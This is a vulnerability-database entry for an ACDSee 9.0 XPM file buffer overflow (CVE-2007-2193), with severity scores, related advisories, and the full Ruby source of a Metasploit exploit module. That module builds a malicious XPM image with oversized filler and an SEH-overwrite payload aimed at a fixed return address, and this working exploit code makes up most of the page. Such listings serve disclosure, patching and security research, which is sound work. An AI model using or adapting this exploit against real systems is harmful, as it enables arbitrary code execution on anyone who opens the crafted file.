Lucene search
HistoryDec 07, 2008 - 3:02 p.m.
ACDSee XPM File Section Buffer Overflow
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
0.948
Percentile
99.3%
This module exploits a buffer overflow in ACDSee 9.0. When viewing a malicious XPM file with the ACDSee product, a remote attacker could overflow a buffer and execute arbitrary code.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'ACDSee XPM File Section Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in ACDSee 9.0.
When viewing a malicious XPM file with the ACDSee product,
a remote attacker could overflow a buffer and execute
arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => 'MC',
'References' =>
[
[ 'CVE', '2007-2193' ],
[ 'OSVDB', '35236' ],
[ 'BID', '23620' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'DisablePayloadHandler' => true,
'AllowWin32SEH' => true
},
'Payload' =>
{
'Space' => 750,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
[
[ 'ACDSee 9.0 (Build 1008)', { 'Ret' => 0x10020758 } ],
],
'Privileged' => false,
'DisclosureDate' => '2007-11-23',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xpm']),
])
end
def exploit
filler = rand_text_alpha_upper(rand(25) + 1)
# http://www.fileformat.info/format/xpm/
head = "/* XPM */\r\n"
head << "static char * #{filler}[] = {\r\n"
head << "\""
buff = rand_text_alpha_upper(4200) + generate_seh_payload(target.ret)
foot = "\",\r\n" + "};\r\n"
xpm = head + buff + foot
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(xpm)
end
end
Related
saint
saint
ACDSee XPM file handling buffer overflow
2007-05-10 00:00:00
ACDSee XPM file handling buffer overflow
2007-05-10 00:00:00
ACDSee XPM file handling buffer overflow
2007-05-10 00:00:00
prion
prion
Stack overflow
2007-04-24 17:19:00
cvelist
cvelist
CVE-2007-2193
2007-04-24 17:00:00
exploitdb
exploitdb
ACDSee 9.0 - '.xpm' Local Buffer Overflow
2007-04-22 00:00:00
ACDSee - '.XPM' File Section Buffer Overflow (Metasploit)
2010-09-25 00:00:00
checkpoint_advisories
checkpoint_advisories
cve
cve
CVE-2007-2193
2007-04-24 17:19:00
packetstorm
packetstorm
ACDSee XPM File Section Buffer Overflow
2009-11-26 00:00:00
nvd
nvd
CVE-2007-2193
2007-04-24 17:19:00
CVSS2
9.3
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
EPSS
0.948
Percentile
99.3%
Related for MSF:EXPLOIT-WINDOWS-FILEFORMAT-ACDSEE_XPM-